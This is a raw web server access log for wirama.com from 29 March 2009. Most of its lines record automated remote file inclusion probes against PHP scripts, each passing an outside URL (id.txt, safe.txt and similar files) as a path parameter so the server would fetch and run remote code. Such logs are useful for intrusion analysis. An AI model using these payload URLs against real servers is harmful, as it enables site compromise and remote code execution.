206.220.64.3 - - [29/Mar/2009:01:26:43 -0700] "GET /logs/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.nis-network.org/joomla/cmd.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
206.220.64.3 - - [29/Mar/2009:01:26:43 -0700] "GET /2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.nis-network.org/joomla/cmd.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
65.55.208.58 - - [29/Mar/2009:01:33:57 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.58 - - [29/Mar/2009:01:33:57 -0700] "GET /tmp/?S=D HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
206.220.64.3 - - [29/Mar/2009:01:39:32 -0700] "GET /2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.nis-network.org/joomla/cmd.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
206.220.64.3 - - [29/Mar/2009:01:44:05 -0700] "GET /logs/access.log/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.nis-network.org/joomla/cmd.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
206.220.64.3 - - [29/Mar/2009:01:44:05 -0700] "GET /logs/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.nis-network.org/joomla/cmd.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
65.55.208.50 - - [29/Mar/2009:02:10:41 -0700] "GET /_private/?S=D HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
67.202.41.3 - - [29/Mar/2009:02:14:15 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)" "www.wirama.com"
67.202.41.3 - - [29/Mar/2009:02:14:15 -0700] "GET /_private/?M=A HTTP/1.0" 200 659 "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)" "www.wirama.com"
67.202.41.3 - - [29/Mar/2009:02:14:20 -0700] "GET /_private/?S=A HTTP/1.0" 200 659 "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)" "www.wirama.com"
67.202.41.3 - - [29/Mar/2009:02:14:39 -0700] "GET /_private/form_results.csv HTTP/1.0" 200 0 "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)" "www.wirama.com"
67.202.41.3 - - [29/Mar/2009:02:16:35 -0700] "GET /_private/?D=A HTTP/1.0" 200 659 "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)" "www.wirama.com"
67.202.41.3 - - [29/Mar/2009:02:17:31 -0700] "GET /_private/?N=D HTTP/1.0" 200 659 "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)" "www.wirama.com"
58.227.193.198 - - [29/Mar/2009:02:19:46 -0700] "GET /mambots/content/multithumb/mainbody.php?mosConfig_absolute_path=http://www.ped.gu.se/foton/bildbanken/vadstena/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
58.227.193.198 - - [29/Mar/2009:02:19:46 -0700] "GET /logs/access.log//mambots/content/multithumb/mainbody.php?mosConfig_absolute_path=http://www.ped.gu.se/foton/bildbanken/vadstena/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
58.227.193.198 - - [29/Mar/2009:02:19:46 -0700] "GET /logs//mambots/content/multithumb/mainbody.php?mosConfig_absolute_path=http://www.ped.gu.se/foton/bildbanken/vadstena/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
58.227.193.198 - - [29/Mar/2009:02:19:57 -0700] "GET /mambots/content/multithumb/mainbody.php?mosConfig_absolute_path=http://www.ped.gu.se/foton/bildbanken/vadstena/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
58.227.193.198 - - [29/Mar/2009:02:19:57 -0700] "GET /logs/access.log//mambots/content/multithumb/mainbody.php?mosConfig_absolute_path=http://www.ped.gu.se/foton/bildbanken/vadstena/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
58.227.193.198 - - [29/Mar/2009:02:19:57 -0700] "GET /logs//mambots/content/multithumb/mainbody.php?mosConfig_absolute_path=http://www.ped.gu.se/foton/bildbanken/vadstena/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
58.227.193.198 - - [29/Mar/2009:02:21:33 -0700] "GET /logs/access.log%20//mambots/content/multithumb/mainbody.php?mosConfig_absolute_path=http://www.ped.gu.se/foton/bildbanken/vadstena/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
58.227.193.198 - - [29/Mar/2009:02:21:37 -0700] "GET /logs/access.log%20//mambots/content/multithumb/mainbody.php?mosConfig_absolute_path=http://www.ped.gu.se/foton/bildbanken/vadstena/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
69.64.34.249 - - [29/Mar/2009:02:56:42 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://viparenda.ru/includes/images/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
69.64.34.249 - - [29/Mar/2009:02:56:42 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://viparenda.ru/includes/images/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
94.23.6.5 - - [29/Mar/2009:03:43:18 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
94.23.6.5 - - [29/Mar/2009:03:43:18 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
94.23.6.5 - - [29/Mar/2009:03:43:18 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
94.23.6.5 - - [29/Mar/2009:03:48:45 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
94.23.6.5 - - [29/Mar/2009:03:48:45 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
94.23.6.5 - - [29/Mar/2009:03:48:51 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tongdibanned/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
94.23.6.5 - - [29/Mar/2009:03:48:51 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tongdibanned/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
65.55.208.47 - - [29/Mar/2009:03:48:52 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.47 - - [29/Mar/2009:03:48:52 -0700] "GET /_private/?M=A HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
94.23.6.5 - - [29/Mar/2009:03:50:14 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tongdibanned/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
94.23.6.5 - - [29/Mar/2009:03:50:14 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tongdibanned/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
94.23.6.5 - - [29/Mar/2009:03:50:14 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tongdibanned/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
94.23.6.5 - - [29/Mar/2009:03:50:19 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tongdibanned/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
94.23.6.5 - - [29/Mar/2009:03:53:23 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tongdibanned/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
94.23.6.5 - - [29/Mar/2009:03:53:24 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tongdibanned/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
94.23.6.5 - - [29/Mar/2009:03:53:27 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tongdibanned/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
94.23.6.5 - - [29/Mar/2009:03:53:27 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tongdibanned/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
65.55.208.59 - - [29/Mar/2009:03:59:16 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.59 - - [29/Mar/2009:03:59:17 -0700] "GET /tmp/?S=A HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.52 - - [29/Mar/2009:04:18:18 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.52 - - [29/Mar/2009:04:18:18 -0700] "GET /_private/ HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
61.250.92.173 - - [29/Mar/2009:04:26:10 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 200 1373 "-" "libwww-perl/5.79" "wirama.com"
61.250.92.173 - - [29/Mar/2009:04:26:10 -0700] "GET /?DOCUMENT_ROOT=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 200 916 "-" "libwww-perl/5.79" "wirama.com"
84.165.113.123 - - [29/Mar/2009:04:46:22 -0700] "GET /tmp/ HTTP/1.1" 200 520 "http://www.wirama.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/2009032711 Ubuntu/8.04 (hardy) Firefox/3.0.8" "www.wirama.com"
84.165.113.123 - - [29/Mar/2009:04:46:23 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "http://www.wirama.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/2009032711 Ubuntu/8.04 (hardy) Firefox/3.0.8" "wirama.com"
84.165.113.123 - - [29/Mar/2009:04:46:26 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "http://www.wirama.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/2009032711 Ubuntu/8.04 (hardy) Firefox/3.0.8" "wirama.com"
84.165.113.123 - - [29/Mar/2009:04:46:54 -0700] "GET / HTTP/1.1" 200 916 "http://www.wirama.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/2009032711 Ubuntu/8.04 (hardy) Firefox/3.0.8" "www.wirama.com"
65.55.208.50 - - [29/Mar/2009:05:13:28 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.50 - - [29/Mar/2009:05:13:28 -0700] "GET /logs/access.log HTTP/1.1" 200 36289 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
208.80.195.35 - - [29/Mar/2009:05:21:53 -0700] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Compaq; YComp 5.0.0.0)" "www.wirama.com"
213.203.223.93 - - [29/Mar/2009:07:06:39 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lamer.or.kr/public/bbs/icon/bratid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
213.203.223.93 - - [29/Mar/2009:07:06:39 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lamer.or.kr/public/bbs/icon/bratid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
89.111.173.113 - - [29/Mar/2009:07:12:09 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.planete-riviere.com/hk? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
89.111.173.113 - - [29/Mar/2009:07:12:09 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.planete-riviere.com/hk? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
89.111.173.113 - - [29/Mar/2009:07:12:09 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.planete-riviere.com/hk? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
89.111.173.113 - - [29/Mar/2009:07:29:34 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.planete-riviere.com/hk? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
89.111.173.113 - - [29/Mar/2009:07:29:34 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.planete-riviere.com/hk? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
89.111.173.113 - - [29/Mar/2009:07:31:10 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.planete-riviere.com/hk? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
203.146.26.6 - - [29/Mar/2009:07:32:43 -0700] "GET /logs//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.ybrt.cn/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
203.146.26.6 - - [29/Mar/2009:07:32:44 -0700] "GET /plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.ybrt.cn/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
89.111.173.113 - - [29/Mar/2009:07:42:07 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.planete-riviere.com/hk? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
89.111.173.113 - - [29/Mar/2009:07:42:08 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.planete-riviere.com/hk? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
89.111.173.113 - - [29/Mar/2009:07:42:08 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.planete-riviere.com/hk? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
150.101.216.60 - - [29/Mar/2009:09:04:53 -0700] "GET /logs/errors.php?error=http://systemasdelacosta.com/Scripts/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
150.101.216.60 - - [29/Mar/2009:09:04:54 -0700] "GET /errors.php?error=http://systemasdelacosta.com/Scripts/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
200.201.180.130 - - [29/Mar/2009:09:06:46 -0700] "GET /errors.php?error=http://direct.gsmobile.com/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.wirama.com"
86.125.85.254 - - [29/Mar/2009:09:08:53 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/shellerlimatuju/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
86.125.85.254 - - [29/Mar/2009:09:08:53 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/shellerlimatuju/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
88.131.106.14 - - [29/Mar/2009:09:23:27 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.wirama.com"
88.131.106.14 - - [29/Mar/2009:09:23:27 -0700] "GET /news.html HTTP/1.0" 404 275 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.wirama.com"
200.201.180.130 - - [29/Mar/2009:09:24:17 -0700] "GET /logs/access.log/errors.php?error=http://direct.gsmobile.com/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.wirama.com"
200.201.180.130 - - [29/Mar/2009:09:24:18 -0700] "GET /errors.php?error=http://direct.gsmobile.com/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.wirama.com"
200.201.180.130 - - [29/Mar/2009:09:24:18 -0700] "GET /logs/errors.php?error=http://direct.gsmobile.com/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.wirama.com"
65.55.208.59 - - [29/Mar/2009:09:24:28 -0700] "GET /_private/?N=D HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
74.6.22.101 - - [29/Mar/2009:09:31:49 -0700] "GET /logs/ HTTP/1.0" 200 1357 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "wirama.com"
148.245.102.115 - - [29/Mar/2009:09:34:01 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://betterchoice.secureserver101.com//assets/export/idv6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
148.245.102.115 - - [29/Mar/2009:09:34:01 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://betterchoice.secureserver101.com//assets/export/idv6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
207.97.223.185 - - [29/Mar/2009:09:58:55 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.nazdar.ru/forum/phpBB3/language/ru/iso.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
207.97.223.185 - - [29/Mar/2009:09:58:56 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.nazdar.ru/forum/phpBB3/language/ru/iso.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
207.97.223.185 - - [29/Mar/2009:09:58:56 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.nazdar.ru/forum/phpBB3/language/ru/iso.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
222.122.158.20 - - [29/Mar/2009:10:00:16 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://otdelka-stroy.ru/images/f1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.122.158.20 - - [29/Mar/2009:10:00:16 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://otdelka-stroy.ru/images/f1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.122.158.20 - - [29/Mar/2009:10:00:17 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://otdelka-stroy.ru/images/f1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
207.97.223.185 - - [29/Mar/2009:10:01:10 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.nazdar.ru/forum/phpBB3/language/ru/iso.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
207.97.223.185 - - [29/Mar/2009:10:01:10 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.nazdar.ru/forum/phpBB3/language/ru/iso.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
207.97.223.185 - - [29/Mar/2009:10:02:18 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.nazdar.ru/forum/phpBB3/language/ru/iso.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
222.122.158.20 - - [29/Mar/2009:10:04:00 -0700] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://otdelka-stroy.ru/images/f1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
148.245.102.115 - - [29/Mar/2009:10:04:26 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://betterchoice.secureserver101.com//assets/export/idv6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
148.245.102.115 - - [29/Mar/2009:10:04:26 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://betterchoice.secureserver101.com//assets/export/idv6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
207.97.223.185 - - [29/Mar/2009:10:05:11 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.nazdar.ru/forum/phpBB3/language/ru/iso.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
207.97.223.185 - - [29/Mar/2009:10:05:11 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.nazdar.ru/forum/phpBB3/language/ru/iso.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
222.122.158.20 - - [29/Mar/2009:10:17:16 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://otdelka-stroy.ru/images/f1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.158.20 - - [29/Mar/2009:10:17:16 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://otdelka-stroy.ru/images/f1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.158.20 - - [29/Mar/2009:10:17:16 -0700] "GET /logs/access_090301.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://otdelka-stroy.ru/images/f1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.160.145 - - [29/Mar/2009:10:37:33 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lamer.or.kr/public/bbs/icon/bratid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
222.122.160.145 - - [29/Mar/2009:10:37:34 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lamer.or.kr/public/bbs/icon/bratid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
193.41.116.26 - - [29/Mar/2009:10:56:36 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
193.41.116.26 - - [29/Mar/2009:10:56:36 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
193.41.116.26 - - [29/Mar/2009:10:56:36 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
79.170.43.200 - - [29/Mar/2009:11:03:55 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://unlockedphones.eu/antivirus/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
79.170.43.200 - - [29/Mar/2009:11:03:55 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://unlockedphones.eu/antivirus/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
79.170.43.200 - - [29/Mar/2009:11:03:55 -0700] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://unlockedphones.eu/antivirus/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
194.0.200.1 - - [29/Mar/2009:11:04:56 -0700] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
194.0.200.1 - - [29/Mar/2009:11:04:56 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
194.0.200.1 - - [29/Mar/2009:11:04:56 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
139.11.11.110 - - [29/Mar/2009:11:05:49 -0700] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
139.11.11.110 - - [29/Mar/2009:11:05:49 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
139.11.11.110 - - [29/Mar/2009:11:05:50 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
139.11.11.110 - - [29/Mar/2009:11:06:04 -0700] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
